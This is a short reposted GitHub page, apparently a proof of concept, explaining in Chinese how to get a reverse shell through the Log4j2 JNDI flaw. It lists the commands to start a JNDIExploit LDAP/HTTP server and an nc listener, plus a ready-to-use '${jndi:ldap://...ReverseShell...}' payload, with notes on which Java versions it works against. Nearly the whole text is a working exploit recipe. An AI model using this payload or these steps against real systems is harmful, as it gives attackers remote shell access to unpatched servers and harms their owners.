AMJIYU/log4j2-reverseshell-poc

AMJIYU/log4j2-reverseshell-poc
2021-12-19 00:27:52 Author: github.com(查看原文) 阅读量:297 收藏

Latest commit

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

1、使用JNDIExploit启动LDAP与 HTTP https://github.com/0x727/JNDIExploit

[email protected] ~> java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 127.0.0.1

[+] LDAP Server Start Listening on 1389... [+] HTTP Server Start Listening on 3456...

2、nc 开启监听

[email protected] ~> nc -l 127.0.0.1 8088 -v

3、payload：

${jndi:ldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/8088}

当前版本1.8.0_181 ，jdk1.8.191以上默认不支持ldap协议无法复现

文章来源: https://github.com/AMJIYU/log4j2-reverseshell-poc
如有侵权请联系:admin#unsafe.sh